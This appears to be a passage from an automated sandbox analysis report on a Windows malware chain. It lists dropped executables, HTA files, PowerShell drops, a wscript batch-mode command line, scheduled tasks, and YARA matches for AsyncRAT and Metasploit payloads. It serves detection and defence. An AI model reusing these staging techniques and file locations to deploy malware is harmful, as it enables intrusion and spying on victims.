Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c513f5b7-5
Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3bab46f3-5
Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1c8ae419-0

Creates HTA files

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	File created: C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Temp\v468GkyBl.hta
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	File created: C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Windows\System32\cmd.exe	File created: C:\Temp\i2GY6vn5L.hta

PE file contains section with special chars

Source: DhqvS8pXj8.exe	Static PE information: section name:
Source: DhqvS8pXj8.exe	Static PE information: section name: .idata
Source: DhqvS8pXj8.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: d895046020.exe.6.dr	Static PE information: section name:
Source: d895046020.exe.6.dr	Static PE information: section name: .idata
Source: d895046020.exe.6.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F7D5EB: CreateFileW,DeviceIoControl,CloseHandle,

8_2_00F7D5EB

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F71201

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		8_2_00F7E8F6
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		30_2_004038AF

Creates files inside the system directory

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	File created: C:\Windows\SchedulesAb
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	File created: C:\Windows\ContainsBefore
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	File created: C:\Windows\TokenDetroit
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	File created: C:\Windows\AttacksContacted
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	File created: C:\Windows\Tasks\Test Task17.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_008EE530	6_2_008EE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_009278BB	6_2_009278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00927049	6_2_00927049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00928860	6_2_00928860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_009231A8	6_2_009231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_008E4DE0	6_2_008E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00922D10	6_2_00922D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0092779B	6_2_0092779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00917F36	6_2_00917F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_008E4B30	6_2_008E4B30
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027BD1A8	7_2_027BD1A8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049354FE	7_2_049354FE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_04933410	7_2_04933410
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493CCC8	7_2_0493CCC8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493AF28	7_2_0493AF28
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049331C4	7_2_049331C4
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049343D8	7_2_049343D8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049343C8	7_2_049343C8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493CCB8	7_2_0493CCB8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493AF18	7_2_0493AF18
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_04939A2E	7_2_04939A2E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493DA60	7_2_0493DA60
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493DA68	7_2_0493DA68
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_04993A08	7_2_04993A08
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049903D8	7_2_049903D8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049915E0	7_2_049915E0
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049906FF	7_2_049906FF
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0609F818	7_2_0609F818
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0609F540	7_2_0609F540
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0609E500	7_2_0609E500
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F18060	8_2_00F18060
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F82046	8_2_00F82046
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F78298	8_2_00F78298
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F4E4FF	8_2_00F4E4FF
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F4676B	8_2_00F4676B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00FA4873	8_2_00FA4873
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F1CAF0	8_2_00F1CAF0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F3CAA0	8_2_00F3CAA0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F2CC39	8_2_00F2CC39
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F46DD9	8_2_00F46DD9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F191C0	8_2_00F191C0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F2B119	8_2_00F2B119
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F31394	8_2_00F31394
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F31706	8_2_00F31706
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F3781B	8_2_00F3781B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F319B0	8_2_00F319B0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F2997D	8_2_00F2997D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F17920	8_2_00F17920
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F37A4A	8_2_00F37A4A
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F37CA7	8_2_00F37CA7
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F31C77	8_2_00F31C77
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F49EEE	8_2_00F49EEE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F9BE44	8_2_00F9BE44
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F31F32	8_2_00F31F32
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_0040737E	30_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406EFE	30_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_004079A2	30_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_004049A8	30_2_004049A8

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: String function: 00F30A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: String function: 00F2F9F2 appears 31 times

Searches for the Microsoft Outlook file path

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Uses 32bit PE files

Source: DhqvS8pXj8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: DhqvS8pXj8.exe	Static PE information: Section: fsnlaalu ZLIB complexity 0.9941688544489612
Source: skotes.exe.0.dr	Static PE information: Section: fsnlaalu ZLIB complexity 0.9941688544489612
Source: random[2].exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 1e8dfbd5c2.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: random[1].exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[1].exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 5d2afc26b8.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 5d2afc26b8.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[2].exe1.6.dr	Static PE information: Section: ZLIB complexity 0.996481948757764
Source: random[2].exe1.6.dr	Static PE information: Section: voasjcay ZLIB complexity 0.9943484166047548
Source: d895046020.exe.6.dr	Static PE information: Section: ZLIB complexity 0.996481948757764
Source: d895046020.exe.6.dr	Static PE information: Section: voasjcay ZLIB complexity 0.9943484166047548
Source: random[1].exe1.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: dc785309cb.exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875

Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: k6Sly2p.exe.6.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: k6Sly2p.exe.6.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: k6Sly2p.exe.6.dr, -.cs	Cryptographic APIs: 'CreateDecryptor'

Source: random[2].exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 1e8dfbd5c2.exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: random[1].exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 5d2afc26b8.exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@141/86@2/3

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F837B5 GetLastError,FormatMessageW,

8_2_00F837B5

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F710BF AdjustTokenPrivileges,CloseHandle,		8_2_00F710BF
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		8_2_00F716C3

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

8_2_00F851CD

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

8_2_00F9A67C

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

8_2_00F8648E

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

8_2_00F142A2

Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE

